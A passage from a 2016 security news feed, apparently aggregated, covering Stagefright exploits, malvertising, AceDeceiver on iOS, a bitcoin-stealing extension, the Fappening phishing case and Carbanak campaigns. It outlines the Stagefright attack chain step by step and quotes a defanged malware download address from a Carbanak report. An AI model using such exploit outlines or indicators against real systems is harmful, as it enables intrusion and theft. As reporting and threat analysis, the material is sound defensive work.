One thing is worth emphasizing: if you do not allow installation from sources other than Google Play on Android, a virus like this has no way of getting into your phone.
You usually cannot catch anything from Google Play, and X-Video on Google Play contains nothing malicious. The “Adobe Flash Player update” gets onto the phone (or tablet) only if you download the apk from somewhere else and then perform the installation yourself.
Android Stagefright Exploit: Millions of devices open to 10-second hack
18.3.2016 Android
Millions of Android devices are open to hacking attacks due to the newly disclosed Android Stagefright Exploit that can hack a smartphone in 10 seconds.
New problems for Android users, security experts at software research firm NorthBit have developed an exploit for a Stagefright vulnerability affecting Google’s operating system.
Millions of Android devices are open to hacking attacks due to the newly disclosed Android Stagefright Exploit that could allow attackers to hack a smartphone in 10 seconds.
The attacker just needs to trick users into visiting a specifically crafted web page that includes a malicious multimedia file.
The researchers at NorthBit have dubbed the Android Stagefright Exploit Metaphor, and they published a detailed analysis of the attack in a paper entitled “Metaphor: A (real) real-life Stagefright exploit.”
The researchers have published a proof-of-concept video that shows how they hacked an Android Nexus 5 device using their Metaphor exploit in just 10 seconds. They also demonstrated that the Android Stagefright Exploit Metaphor works against other mobile devices, including Samsung Galaxy S5, LG G3 and HTC One smartphones.
“Although the bug exists in many versions (nearly a 1,000,000,000 devices) it was claimed impractical to exploit in-the-wild, mainly due to the implementation of exploit mitigations in newer Android versions, specifically ASLR.” states the paper.
The Android Stagefright Exploit works on Android versions 2.2 to 4.0 and 5.0 to 5.1 while bypassing ASLR on Android versions 5.0 to 5.1, as version 2.2 to version 4.0 do not implement ASLR. Other Android versions are not affected by the new Stagefright exploit.
Stagefright was first discovered in July 2015, when experts at security firm Zimperium announced that the flaw is the worst Android vulnerability in the mobile OS's history.
The Stagefright flaw affects the media library used by Android to process media files. According to the experts at Zimperium, the media library is affected by several vulnerabilities.
Joshua Drake from Zimperium discovered seven critical vulnerabilities in the native media playback engine called Stagefright, the expert defined the Stagefright flaw the “Mother of all Android Vulnerabilities.”
The attackers can exploit the vulnerability by sending a single multimedia text message to an unpatched Android device. Although Google has already issued a patch and sent it out to the company’s partners, most manufacturers have not yet distributed the patch to their customers, exposing them to cyber attack.
In September 2015, experts at Zimperium released a Stagefright exploit, demonstrating how to trigger the Remote Code Execution (RCE). The researchers implemented the Stagefright Exploit in python by creating an MP4 exploiting the ‘stsc’ vulnerability, aka Stagefright vulnerability.
In October 2015, experts at Zimperium discovered that a billion Android phones were vulnerable to new Stagefright vulnerabilities, dubbed Stagefright 2.0 that could allow attackers to execute malicious code on the targeted device.
The researchers discovered two bugs that are triggered when processing specially crafted MP3 audio or MP4 video files.
The hacking procedure described by the researchers at NorthBit is composed of the following steps:
Tricking a victim into visiting a malicious page containing a video file that crashes the media server to reset its internal state.
Once the media server restarts, the JavaScript hosted on the web page sends information about the device to the attacker’s server.
The server replies with a custom generated video file to the affected device, exploiting the Stagefright bug to reveal more information about the device’s internal state.
This information is also sent back to the attacker’s server to craft another video file that embeds a malicious payload, which allows the attacker to gain control of the mobile device.
Ransomware spread via compromised ad networks and major US websites
17.3.2016 Viruses
Malicious ads made it onto even the largest and most visited American websites. The attackers exploited flaws in Flash, Silverlight and other software.
If you have been browsing large and well-known (foreign) websites in recent days, it is very likely that you encountered advertisements which in reality test whether it is possible to get into your computer.
To do so they use vulnerable Flash, Silverlight, Java and other browser software with known exploitable vulnerabilities. After gaining access to the computer they deploy a Trojan and ransomware, which encrypts data and demands a ransom payment for unlocking it.
Infected ads have also appeared in the Czech Republic in recent days; see Podvodné reklamy straší virovou nákazou, šíří je i reklamní síť Googlu (Fraudulent ads scare with virus infection, Google's ad network spreads them too).
Trend Micro, in Massive Malvertising Campaign in US Leads to Angler Exploit Kit/BEDEP, states that the attacking code is the old familiar Angler and that the campaign itself appears to target only users in the US. The result of the attack is the download of a backdoor known as BEDEP and of malware that Trend Micro designates TROJAN_AVRECON. Trustwave, in Angler Takes Malvertising to New Heights, confirms the information and adds some further specific facts.
It is interesting, for example, that the attacking JavaScript itself has over 12 thousand lines of code and is of course written so that it is very difficult to determine what it actually does. Among other things, it tries to avoid computers protected by certain antivirus or anti-malware programs. The affected ad networks are, according to Trustwave, mainly adnxs and taggify, of which only the first faced the problem head-on and offered a quick solution.
Malwarebytes, in Large Angler Malvertising Campaign Hits Top Publishers, adds a fairly useful list of websites on which the malicious ads appeared; it includes MSN.com, NYTimes.com, BBC.com, AOL.COM and NewsWeek.com (but also a number of others), which reach hundreds of millions of visitors per month. The compromised ad networks were, as usual, used to get the ads into the big ad networks, including Google, AppNexus, AOL and Rubicon.
Malwarebytes also adds that the original exploit kit was RIG; only on Sunday was it replaced by Angler, to which the freshly discovered Silverlight vulnerability had also been added.
Encrypted ProtonMail is now available to everyone. Smartphone apps are also available
17.3.2016 Security
ProtonMail was created at the beginning of last year as a result of increased demand for secure communication. The developers, who have work experience from CERN in Switzerland, encrypt the text of messages with OpenPGP, so it travels across the Internet as a meaningless jumble of characters. It is decrypted only at the other end, at the recipient. ProtonMail is now moving from beta into regular operation, and anyone can register an account.
At first glance the ProtonMail mailbox looks like any other webmail. Messages, however, are encrypted both when they are sent and when they are stored on the operator's server.
Registration for users who were not part of the beta test opened today at 12:30, and at the same time applications for mobile devices headed to the App Store and Google Play. In the blog post in which the company's founder announced the official launch, he emphasized the growing demand for communication secured in this way, also in connection with the current controversy that has unfolded around encryption.
ProtonMail started with a successful crowdfunding campaign that brought its creators 550,000 dollars, about 13 million Czech crowns. New users currently get a mailbox with 500 MB of capacity, and expansion is done through one of the paid accounts. For an additional 5 GB you pay 5 euros a month and gain the ability to send up to 1,000 messages a day. In the basic free version the limit is set at 150 messages. For a surcharge you can get custom domains with several aliases, or the ability to sort messages with more labels; the free version has 20.
On registration you choose a regular login password and then a second one, with which messages are encrypted. The first can be reset if you associate another regular e-mail address with the account. The encryption password, however, cannot be recovered in any way, and if you lose it you will no longer be able to access your previous mail.
Biohacking - Human 2.0
17.3.2016 Hacking
Enthusiasts already exist today who undergo painful procedures in order to improve their bodies with technology and thus become much more perfect cyborgs. The whole movement, one branch of so-called biohacking, is still in its infancy.
Human imagination, creativity and enthusiasm for experimentation seem to know no bounds. On the other hand, human creativity should also have certain limits. On the Internet, for example, a group of people is currently forming who experiment with neuronal brain stimulation technology at home.
The American company Foc.us claims to have developed a special headset that, once worn, will give computer gamers better reaction times. Many hope this technique will boost their mood or improve their ability to learn. One university student on YouTube speaks openly about having placed stimulation electrodes on his head “somewhere there and here”. Instead of improving his abilities, however, he fell into a deep depression for at least an hour, which did not discourage him from further experiments.
Extending human mental and physical abilities, or attempts to create a kind of perfect cyborg using technology, are referred to as grinding. It could be classified as a subcategory of so-called biohacking. In the other branch of this relatively new field, people experiment primarily with the hereditary code, DNA.
Amateur biologists “hack” DNA at home and develop, for example, new kinds of vegetables. They have already created a yogurt that fluoresces green in the dark because a jellyfish gene was added to its protein. The other branch of biohacking is then the aforementioned grinding, in which hackers try to modify humans themselves using modern technical gadgets; grinders call it “self-biohacking”, or perhaps even more aptly “self-customization”. Let us look at which limits, ethical, technological and others, their creative experimentation runs up against.
Chip control over patients
Biohacking of the DNA code provokes public opposition for entirely understandable reasons. It is obvious that amateur home experimentation with the code of life can backfire. Technology-oriented grinding, on the other hand, does not arouse such emotions, because people who try to turn themselves into improved cyborgs with the help of technology can generally only harm themselves.
Technical devices that try to make people's lives easier naturally already exist today; in medicine these include various kinds of prostheses, pacemakers and the like. For diabetics there is help in the form of a new technology being developed by the University of Akron in the US. Scientists there are working on a contact lens that measures blood sugar levels from tears.
According to them, the lens then changes color, so a diabetic can find out the body's sugar level by looking in the mirror. Alternatively, the eye can be photographed and special software then calculates the sugar level from the color of the lens, according to which the patient then chooses the appropriate dose of insulin.
In medicine we would find many other attempts at this kind of non-invasive, “moderate grinding”. The contact lens for diabetics arouses no negative emotions, apart from doubts about whether information about blood sugar levels should, through the color of the lens, also be available to everyone nearby. A more controversial case, for example, are the efforts to integrate chips into pills containing medication.
Cybercriminals stole bitcoins using a browser extension
17.3.2016 Hacking
The bitcoin exchange rate has held fairly high for the last few weeks. That is one of the main reasons why this virtual currency attracts more and more people around the world. The high popularity has not left cybercriminals indifferent either, and they have targeted bitcoin owners. The chance of catching them is practically zero.
The computer pirates targeted users of the website BitcoinWisdom.com, which is visited every month by millions of users from various corners of the world. The server offers, in a fairly clear form, information about the bitcoin exchange rate and analyses of possible rate developments. For users it is thus a kind of guide on how to buy or sell.
The cybercriminals offered users of the server an extension for the popular Chrome browser that allowed ads to be blocked on the BitcoinWisdom.com pages.
That is exactly what the extension did in practice, so for the first few days of use users probably did not even notice that something was wrong. Besides blocking ads, the extension also redirected bitcoin payments, the Softpedia server reported.
Sent money ended up in the pirates' accounts
The money sent thus ended up in the fraudsters' accounts. Given that bitcoin transactions are practically impossible to trace, it is very unlikely that the cybercriminals will be tracked down.
In any case, it is clear that this was a really big business for the computer pirates. A single bitcoin is worth about 10,000 Czech crowns at the current exchange rate. They could therefore have earned a decent pile of money even if they managed to obtain only a few bitcoins.
How many users the cybercriminals managed to rob through the extension is not yet known.
Virtual currencies pose a big risk
The virtual currency bitcoin was created in 2009, but it has enjoyed greater popularity in recent years. It was created so that it cannot be influenced by any government or central bank.
The cyber coins are "minted" by a network of computers with specialized software programmed to release new coins at a steady but ever-decreasing rate. The number of coins in circulation is eventually to reach 21 million, which should be around 2140.
Bitcoins enjoy great popularity primarily as an investment vehicle. The exchange rates, however, often fluctuate. The European Banking Authority has therefore already warned consumers that unregulated virtual currencies pose a big risk. Deposits in them are not protected in any way.
DARPA Invites Geeks to Convert Everyday Objects into Deadly Weapons
17.3.2016 IT
Did you know that your daily household items can be turned into deadly weapons?
Yes, it's possible to convert some of your everyday household appliances into explosives, weapons or surveillance devices.
DARPA – the agency that conducts research in various fields to improve the capabilities of the US Military and the US Department of Defense – has announced a new project dubbed "Improv" to transform simple household appliances into deadly weapons, i.e. homemade weapons.
In previous years, various military-grade weapons were found to have been disrupted by ordinary household items capable of crippling military inventions.
From various incidents around military grounds, officials observed "how easily-accessed hardware, software, processes, and methods could be used to create products or systems that could pose a future threat."
So DARPA (the Defense Advanced Research Projects Agency) launched a program and is seeking proposals from engineers, skilled hardware hackers, biologists and information technologists who can come up with innovative ideas for building deadly systems or devices by unleashing the power of everyday things.
Improv - Initiative to Build Weaponised Capabilities into Home Appliances
The Improv program will research systems and devices built from readily available technology that could threaten national security by challenging current military equipment.
"Improv will explore ways to combine or convert commercially available products such as off-the-shelf electronics, components created through rapid prototyping, and open-source code to cost-effectively create sophisticated military technologies and capabilities," said John Main, Improv's Program Manager.
The program's primary aim is to discover how weaponized capabilities could be built into ordinary household items.
Open Challenge!
Improv will go through 3 phases to finalize the proposed system:
Phase 1: Submit plans for an off-the-shelf prototype; if selected, candidates will be rewarded with $40,000.
Phase 2: The second round of the program requires selected candidates to turn the proposed prototype model into a real-world system, for which DARPA will fund $70,000.
Phase 3: The final stage is a live demonstration, with up to $20,000 for testing.
Candidates have to complete this task within a strict 90-day deadline, per DARPA's rules.
Improv recognizes that no one can be a jack of all trades. Hence, no one is excluded from giving it a try, which could really help protect against these potential dangers, unlike the "Hack the Pentagon" program, which was open only to US nationals.
Nowadays many new methods are emerging to manipulate legitimate systems, which is a nightmare for millions and a dream for criminals.
So Improv can be seen as a new dimension of US military defense for tackling such risky attacks.
ProtonMail is open. Do you want an encrypted email account? Sign in!
17.3.2016 Security
ProtonMail, the world’s largest privacy-focused and encrypted email provider, announced today that the service is leaving beta.
ProtonMail, the world’s largest privacy-focused and encrypted email provider, announced today that the service is leaving beta and will be allowing open registrations for the first time in nearly two years. For the past couple of years, ProtonMail has been invite-only, and more than one million users have had the opportunity to test the beta. The service also presented its free mobile apps, available for both Apple iOS and Android devices.
ProtonMail was first launched in beta in May 2014 by a group of scientists who met at CERN and MIT, but its popularity peaked after Snowden‘s revelations about the mass surveillance operated by the Five Eyes alliance.
The company then received an impressive number of requests for new accounts, which forced it to create a waiting list. According to the company, the requests exceeded 10,000 per day.
ProtonMail is an essential instrument for protecting our privacy; businesses, journalists, activists, security experts, private individuals, me … and Mr Robot already use it. The email service implements end-to-end encryption, allowing users to communicate securely on the Internet and making it impossible for law enforcement and intelligence agencies to eavesdrop on the traffic.
In the end-to-end encryption model, data is encrypted on the sender’s system before it is passed to the service provider’s servers, which forward the encrypted data to the intended recipient, who is the only party able to decrypt it.
Of course, this isn’t an easy moment for companies that offer such services: ProtonMail has been frequently thrust into the public debate over encryption and terrorism, and in several cases it has had problems with governments over protecting user privacy.
“Strong encryption and privacy are a social and economic necessity, not only does this technology protect activists and dissidents, it is also key to securing the world’s digital infrastructure,” says ProtonMail Co-Founder Dr. Andy Yen, “this is why all things considered, strong encryption is absolutely necessary for the greater good.”
ProtonMail has decided to open the service for public registration, which means that everyone can obtain an account for free immediately.
“The best way to ensure that encryption and privacy rights are not encroached upon is to get the tools into the hands of the public as soon as possible and widely distributing them,” says Yen, “This way, we put the choice in the hands of the consumer, and not government regulators.”
“The past decade has been marked by a massive erosion of privacy and we’re working to reverse this trend,” says Yen. “Encrypted communications is the future and ProtonMail is committed to making online privacy a reality again for all Internet users.”
Get your free account!
New Exploit to 'Hack Android Phones Remotely' threatens Millions of Devices
17.3.2016 Android
Millions of Android devices are vulnerable to hackers and intelligence agencies once again – Thanks to a newly disclosed Android Stagefright Exploit.
Yes, Android Stagefright vulnerability is Back…
…and this time, the Stagefright exploit allows an attacker to hack Android smartphones in 10 seconds just by tricking users into visiting a hacker's web page that contains a malicious multimedia file.
A group of security researchers from the Israel-based research firm NorthBit claimed it had successfully exploited the Stagefright bug that emerged in Android last year and was described as the "worst ever discovered".
The new Stagefright exploit, dubbed Metaphor, is detailed in a research paper [PDF] that guides bad guys, good guys and government spying agencies alike in building the Stagefright exploit for themselves.
Just yesterday, we reported about critical vulnerabilities in Qualcomm Snapdragon chip that could be exploited by any malicious application to gain root access on a vulnerable Android device, leaving more than a Billion Android devices at risk.
Video Demonstration — Exploit to Hack Android Phone in 10 Seconds
The researchers have also provided a proof-of-concept video demonstration that shows how they successfully hacked an Android Nexus 5 device using their Metaphor exploit in just 10 seconds. They also successfully tested Metaphor on the Samsung Galaxy S5, LG G3 and HTC One smartphones.
According to the researchers, millions of unpatched Android devices are vulnerable to their exploit, which successfully bypasses the security defenses offered by the Android operating system.
What is the Stagefright Bug and Why Should You Worry about it?
Stagefright is a multimedia playback library, written in C++, built inside the Android operating system to process, record and play multimedia files such as videos.
However, what Zimperium researchers discovered last year was that this core Android component can be remotely exploited to hijack 95 percent of Android devices with just a simple booby-trapped message or web page.
Another critical Stagefright vulnerability, discovered last October, involved flaws in the handling of MP3 and MP4 files, which when opened could remotely execute malicious code on Android devices; it was dubbed Stagefright 2.0.
To tackle this serious issue, Google released a security update that patches the critical bug and promised regular security updates for Android smartphones given the seriousness of the Stagefright bugs.
Here's How the New Stagefright Exploit Works
Researchers described the following process to successfully hijack any vulnerable Android smartphone or tablet:
Step 1: Tricking a victim into visiting a malicious web page containing a video file that crashes Android's mediaserver software, resetting its internal state.
Step 2: Once mediaserver restarts, JavaScript on the web page sends information about the victim's device over the Internet to the attacker's server.
Step 3: The attacker's server then sends a custom generated video file to the affected device, exploiting the Stagefright bug to reveal more info about the device's internal state.
Step 4: This information is also sent back to the attacker's server to craft another video file that embeds a payload of malware in it, which when processed by Stagefright starts executing on the victim's smartphone with all the privileges it needs to spy on its owner.
The researchers also claim that their exploit specifically attacks the CVE-2015-3864 vulnerability in a way that bypasses Address Space Layout Randomization (ASLR), a memory protection mechanism.
"It was claimed [the Stagefright bug] was impractical to exploit in the wild, mainly due to the implementation of exploit mitigations in [latest] Android versions, specifically ASLR," the research paper reads.
The team's exploit works on Android versions 2.2 to 4.0 and 5.0 to 5.1, bypassing ASLR on Android versions 5.0 to 5.1, as versions 2.2 to 4.0 do not implement ASLR. Other Android versions are not affected by the new Stagefright exploit.
You can go through the full research paper [PDF] that provides enough details to create a fully working and successful exploit.
Warning — Hackers can Silently Install Malware to Non-Jailbroken iOS Devices
17.3.2016 iOS
Hard time for mobile phone users!
Just recently, two severe vulnerabilities, in the Qualcomm Snapdragon chip and in Stagefright, were spotted on the Android platform, affecting more than a billion and millions of devices respectively.
And now:
Hackers have discovered a new way to install malicious apps onto your iPhone without your interaction.
Researchers at Palo Alto Networks have uncovered a new strain of malware that can infect Non-Jailbroken (factory-configured) iPhones and iPads without the owner's knowledge or interaction, leaving hundreds of millions of Apple iOS devices at risk.
Dubbed AceDeceiver, the iPhone malware installs itself on iOS devices without enterprise certificates and exploits design flaws in Apple's digital rights management (DRM) protection mechanism called FairPlay.
What's more concerning about this malware:
Unlike most iOS malware, AceDeceiver works on factory-configured (non-jailbroken) iOS devices as well.
FairPlay is Apple's software mechanism that prevents people from stealing apps purchased from its official App Store.
However, with the help of AceDeceiver's "FairPlay Man-in-the-Middle (MITM) technique," hackers can install malicious apps on your iPhone even without your knowledge, simultaneously bypassing Apple's other security defenses.
According to researchers, the FairPlay Man-In-The-Middle (MITM) technique has been in use since 2013, as a way to distribute pirated iOS apps.
"In the FairPlay MITM attack, attackers purchase an app from App Store then intercept and save the authorization code," Claud Xiao from Palo Alto Networks explains in a blog post. "They then developed PC software that simulates the iTunes client behaviors, and tricks iOS devices to believe the app was purchased by the victim."
However, this is the first time the FairPlay technique has been used to spread malware on iOS devices, as the creator of the pirated software can install potentially malicious apps without your knowledge.
Currently, the malicious behaviors related to AceDeceiver have been spotted in China, but researchers warn that the malware could easily be configured to target iPhone users in other geographic regions as well.
For more details, you can head on to Palo Alto Networks' blog post about the AceDeceiver threat.
American Express issued a notice of data breach
17.3.2016 Security
American Express is informing cardholders that their payment card data may have been exposed after a third-party service provider suffered a security breach.
Another illustrious victim of a data breach is in the headlines; this time, American Express is warning cardholders of a possible incident that occurred at a third-party service provider. The name of the affected service provider has not been made public.
According to American Express, data associated with current or previously issued American Express cards might have been stolen by hackers. The information obtained by unauthorized parties includes account numbers, names, and expiration dates.
“We became aware that a third party service provider engaged by numerous merchants experienced unauthorized access to its system. Account information of some of our Card Members, including some of your account information, may have been involved. It is important to note that American Express owned or controlled systems were not compromised by this incident, and we are providing this notice to you as a precautionary measure.” states a data breach notice published by the Office of the Attorney General of the State of California DoJ.
American Express highlighted that its own systems were not affected by the incident; to prevent abuse, the company is monitoring for fraudulent activity that might affect cardholders.
American Express confirmed that cardholders are not liable for any fraudulent charges, and at the same time it is inviting them to monitor their accounts for fraud.
American Express suggests that cardholders enable instant notifications of potentially fraudulent activity, which the company offers through notifications in the American Express Mobile app or by signing up for email or text messaging at americanexpress.com/accountalerts
“WHAT YOU CAN DO. We ask that you carefully review your account for fraudulent activity. Below are some steps you can take to protect your account. Login to your account at americanexpress.com/MYCA to review your account statements carefully and remain vigilant in doing so, especially over the next 12 to 24 months. If your card is active, sign up to receive instant notifications of potential suspicious activity by enabling Notifications in the American Express Mobile app, or signing up for email or text messaging at americanexpress.com/accountalerts. Please make sure your mobile phone number and email address are also on file for us to contact you if needed. OTHER IMPORTANT INFORMATION. Included with this letter are some additional helpful tips and steps you can take to protect yourself against the risks of fraud and identity theft.” states the notice.
Incidents like this underscore the importance of cyber security across the entire chain of custody for sensitive data: an incident at any point in the chain can compromise the entire process.
In this specific case, American Express relies on a third-party service that was breached, causing the exposure of confidential information.
If you are an AMEX cardholder remain vigilant.
How to install the AceDeceiver malware onto any iOS Device
17.3.2016 iOS
AceDeceiver is the first iOS malware that abuses certain design flaws in Apple’s FairPlay DRM to install malicious apps on iOS devices, even non-jailbroken ones.
Hackers are exploiting a flaw affecting the Apple digital rights management technology (DRM) to install malicious apps on every iOS device, even non-jailbroken ones.
Last month, security experts at Palo Alto Networks firm spotted three malicious applications deployed on the official App Store that were developed to steal Apple IDs and passwords from Chinese users.
The interesting part of the discovery made by Palo Alto is related to the ability of the three apps to be silently installed through software running on Windows machines.
The only ways to install a mobile app on an iOS device that hasn’t been jailbroken are to download it from the official App Store or to install it through the iTunes software on the user’s PC. In the second scenario, the device verifies the legitimate origin of the app with Apple’s FairPlay DRM technology.
In 2014, a team of researchers from the Georgia Institute of Technology presented at the USENIX conference a method through which an iOS device could be tricked into installing, via iTunes, any app previously purchased with a different Apple ID.
At this point the attack scenario is clear: hackers can remotely install apps on an iOS device connected to an already compromised PC.
With this premise, researchers at Palo Alto Networks have now confirmed that hackers in the wild are still using this trick to serve a malicious app named AceDeceiver on non-jailbroken devices.
“We’ve discovered a new family of iOS malware that successfully infected non-jailbroken devices we’ve named “AceDeceiver”.” states a blog post published by Palo Alto Networks.
“What makes AceDeceiver different from previous iOS malware is that instead of abusing enterprise certificates as some iOS malware has over the past two years, AceDeceiver manages to install itself without any enterprise certificate at all. It does so by exploiting design flaws in Apple’s DRM mechanism, and even as Apple has removed AceDeceiver from App Store, it may still spread thanks to a novel attack vector.”
The threat actors first uploaded their apps to the App Store, managing to pass Apple’s review process by submitting them as wallpapers. Once the apps were available on the official store, they purchased them through iTunes in order to capture the FairPlay DRM authorization code.
The crooks developed client software that simulates iTunes and distributed it in China, masquerading it as a helper program for iOS devices that can perform system reinstallation, jailbreaking, system backup, device management, and system cleaning.
“To carry out the attack, the author created a Windows client called ”爱思助手 (Aisi Helper)” to perform the FairPlay MITM attack. Aisi Helper purports to be software that provides services for iOS devices such as system re-installation, jailbreaking, system backup, device management and system cleaning.” continues the post.
When users connected their iOS devices to a computer running this software, it silently installed AceDeceiver using the authorization code captured earlier, when the app was first deployed on the official store.
“By deploying authorized computer in the C2 server, and using a client software as agent in the middle, the attacker can distribute that purchased iOS app to unlimited iOS devices.” reads the post.
What happens if Apple removes the AceDeceiver apps from the official store?
Nothing, the technique presented by the researchers at USENIX in 2014 works even if the app has been removed from the App Store because attackers already have the authorization code they need to complete the installation.
“Even if an app has been removed from the App Store, attackers can still distribute their own copies to iOS users.” the team of experts explained at the USENIX conference.
The technique used to serve the AceDeceiver malware is very dangerous; in the future other criminal gangs could start using it.
“Our analysis of AceDeceiver leads us to believe FairPlay MITM attack will become another popular attack vector for non-jailbroken iOS devices – and thus a threat to Apple device users worldwide. Palo Alto Networks has released IPS signatures (38914, 38915) and has updated URL filtering and Threat Prevention to protect customers from the AceDeceiver Trojan as well as the FairPlay MITM attack technique.” states Palo Alto.
Apple users beware, no one is immune!
Man behind The Fappening case charged with hacking celebrity accounts
17.3.2016 Hacking
A Pennsylvania man behind the Fappening case has been charged with hacking Apple and Google email accounts belonging to more than 100 people.
The culprit in the popular Fappening case may have a name: the US Department of Justice (DOJ) announced on Tuesday that it charged Ryan Collins, 36, of Pennsylvania with hacking Apple and Google email accounts belonging to more than 100 people, mostly celebrities.
In September 2014, the FBI started an investigation after the iCloud accounts of celebrities were hacked by unknown attackers who stole their pictures.
Apple immediately denied that its iCloud platform was breached; instead, it explained that hackers obtained the images by compromising the victims themselves. A few days later, the consumer tech giant also announced that it would
A few days later, Apple announced the implementation of new features to improve the security of the iCloud service.
The list of victims is long and includes Jennifer Lawrence and Kim Kardashian; the hacker stole private images of the celebrities and leaked their nude photos onto 4chan.
“A Pennsylvania man was charged today with felony computer hacking related to a phishing scheme that gave him illegal access to over 100 Apple and Google e-mail accounts, including those belonging to members of the entertainment industry in Los Angeles.” states the press release issued by the DoJ.
Collins admitted his responsibility and signed a plea agreement to plead guilty to a felony violation of the Computer Fraud and Abuse Act.
The man sent spear phishing emails to the victims from November 2012 until the beginning of September 2014. In this way he obtained login credentials from his victims, then illegally accessed their email accounts to obtain sensitive and personal information.
The man behind the Fappening case focused his efforts on accessing nude pictures and videos of the victims; the DoJ announcement also revealed that in some circumstances he used a software program to download the entire contents of the victims’ Apple iCloud backups.
“After illegally accessing the e-mail accounts, Collins obtained personal information including nude photographs and videos, according to his plea agreement. In some instances, Collins would use a software program to download the entire contents of the victims’ Apple iCloud backups.” continues the press release.
The case will be transferred from Los Angeles to Harrisburg in the Middle District of Pennsylvania, where Collins lives.
Collins faces a statutory maximum sentence of five years in federal prison, but he has reached an agreement under which a prison term of 18 months will be recommended.
“By illegally accessing intimate details of his victims’ personal lives, Mr. Collins violated their privacy and left many to contend with lasting emotional distress, embarrassment and feelings of insecurity. We continue to see both celebrities and victims from all walks of life suffer the consequences of this crime and strongly encourage users of Internet-connected devices to strengthen passwords and to be skeptical when replying to emails asking for personal information,” David Bowdich, the Assistant Director in Charge of the FBI’s Los Angeles Field Office, said.
Other hackers have already been charged with hacking celebrities’ email accounts: in December 2015, Alonzo Knowles, aka “Jeff Moxey,” was charged after allegedly hacking into the email accounts of 130 celebrities and stealing personal information, movie scripts and sex tapes.
Carbanak Group targets entities in Middle East and US with new TTPs
17.3.2016 Virus
Proofpoint has collected evidence of new Carbanak group campaigns. The hackers are targeting banks in the Middle East, the United States and other countries.
Security researchers at Proofpoint claim to have collected evidence of new Carbanak group campaigns. This time the hackers are targeting banks in the Middle East, the United States and other countries.
Last year, Kaspersky investigated a number of cyber attacks on 29 Russian organizations; the researchers believe these attacks were coordinated by Carbanak and two other criminal gangs, dubbed “Metel” and “GCMAN,” that adopted similar hacking techniques.
In September 2015, security experts at CSIS discovered that the Carbanak malware was still being used in spear phishing attacks against major organizations in the EU and Europe.
“Just recently, CSIS carried out a forensic analysis involving a Microsoft Windows client that was compromised in an attempt to conduct fraudulent online banking transactions. As part of the forensic task, we managed to isolate a signed binary, which we later identified as a new Carbanak sample.” wrote CSIS in a blog post.
“We speculate that the main purpose of this company is to receive money from fraudulent transactions. As stated in the Kaspersky report, Carbanak-related transfers are rather huge. Possibly, they have registered a company and opened bank accounts in order to receive their stolen money while having full control of the transferring process,”
The new Carbanak trojan relied on predefined IP addresses instead of domains, and to improve its evasion capability its code was signed with a digital certificate issued by Comodo to a Russia-based wholesale company.
Kaspersky confirmed that the Carbanak gang (also called Carbanak 2.0 by Kaspersky) was behind the attacks spotted by CSIS and revealed that the group is now also targeting the budgeting and accounting departments of various types of organizations, including a financial institution and a telecoms company.
The group that targeted a Russian bank used a strain of malware known as Metel (aka Corkow) to compromise banks’ networks via spear-phishing emails.
This week, researchers at Proofpoint revealed that they have spotted new campaigns targeting Middle Eastern countries, including the United Arab Emirates, Kuwait, Lebanon and Yemen. The new campaign is targeting high-level executives, directors, and operations managers at banks and enterprise software firms.
The Carbanak Group seems to be targeting high-level executives, directors, senior managers, and regional and operations managers at banks, financial organizations, companies selling enterprise software, and professional services companies.
The hackers launched spear phishing attacks against victims; the email messages contain a URL pointing to a malicious document designed to trigger an old Office vulnerability (CVE-2015-2545) and serve a malware downloader used to drop the Carbanak payload, aka Spy.Sekur.
In other cases, the Carbanak Group sent malicious emails containing links to the Java-based remote access Trojan jRAT.
“Recently, we detected Carbanak campaigns attempting to:
Target high level executives in financial companies or in financial/decision-making roles in the Middle East, U.S. and Europe
Spear-phishing emails delivering URLs, macro documents, exploit documents
Use of Spy.Sekur (Carbanak malware) and commodity remote access Trojans (RATs) such as jRAT, Netwire, Cybergate and others used in support of operations.” states the report published by Proofpoint.
Experts also analyzed another campaign targeting employees of US- and Europe-based companies in the financial industry, mass media, and other seemingly unrelated targets in fire, safety, air conditioning and heating.
In this second campaign, hackers relied on emails containing Word documents with embedded malicious macros.
“Unlike the March 1st campaign, which contained links to exploit documents, this campaign employed documents attached to email messages. The two observed documents “remitter request_2016-03-05-122839.doc” and “Reverse debit posted in Error 040316.doc” use macros to download the final Spy.Sekur payload from hxxp://154.16.138[.]74/sexit.exe” states the report.
The analysis of the information gathered during the investigation allowed the experts to determine that most attacks targeted organizations in the United States (17.7 percent), followed by Oman, Australia, UAE, Kuwait, Pakistan, the Netherlands and Germany.
The researchers have uncovered links between Carbanak activity and other threats such as Cybergate, DarkComet and the MorphineRAT.
This last wave of attacks is very interesting because the group used new exploits, macro documents, and RATs to compromise non-Russian targets. The group is also expanding the scope of its attacks, targeting companies and organizations in various industries.
'The Fappening' Hacker Reveals How He Stole Nude Pics of Over 100 Celebrities
16.3.2016 Hacking
Almost one and a half years after the massive leak of celebrities' nude photographs — known as "The Fappening" or "Celebgate" scandal — a man has been charged under the Computer Fraud and Abuse Act, facing up to 5 years in prison as a result.
The US Department of Justice (DOJ) announced on Tuesday that it charged Ryan Collins, 36, of Pennsylvania with illegally accessing the Gmail and iCloud accounts of various celebrities, including Jennifer Lawrence and Kim Kardashian, and leaking their nude photos onto 4chan.
Social Engineering Helped Hacker Steal Celebs' Nude Pics
Collins was caught by the Federal Bureau of Investigation (FBI), and in the course of the proceedings the hacker revealed that…
The Fappening did not involve Apple's iCloud services being compromised through password cracking or brute-forcing; rather, it was the result of simple Social Engineering, in the form of Phishing Attacks.
Yes, The Fappening scandal was the result of Social Engineering tricks, while we believed that Apple's iCloud services had been targeted by brute-force password attacks.
At the time the celebrities' nude images were circulating online, Apple denied that its iCloud service was hacked and claimed that the hacks were more likely the result of a phishing scam. That turned out to be the case.
Collins was engaged in Phishing schemes between November 2012 and September 2014, when he hijacked more than 100 celebs' accounts using fake emails disguised as official notifications from Google and Apple, asking victims for their usernames and passwords.
Hacker Used iBrute to Download iCloud Backups
Once done, Collins used this information to access 50 iCloud accounts and 72 Gmail accounts, most of which belonged to female celebs, and in most cases used the specialized 'brute force' software program iBrute to illegally download the contents of their iCloud backups and look for more data, including nude photos of celebrities.
Collins admitted only to hacking the celebrities' accounts, not to uploading their naked photos online.
However, this does not mean Collins did not leak those photographs; the hacker negotiated a lighter guilty plea, allowing United States authorities to close the investigation faster.
Collins has not been sentenced yet but faces a maximum sentence of 5 years in prison for his crime, along with fines of up to $250,000. However, under the plea agreement, the prosecution will recommend to the judge an 18-month prison sentence.
Russia Rejects Google's Appeal and Orders to Stop Pre-Installing its own Android Apps
16.3.2016 Android
The search giant Google has lost an anti-monopoly appeal in Russia against a ruling related to its Android mobile OS.
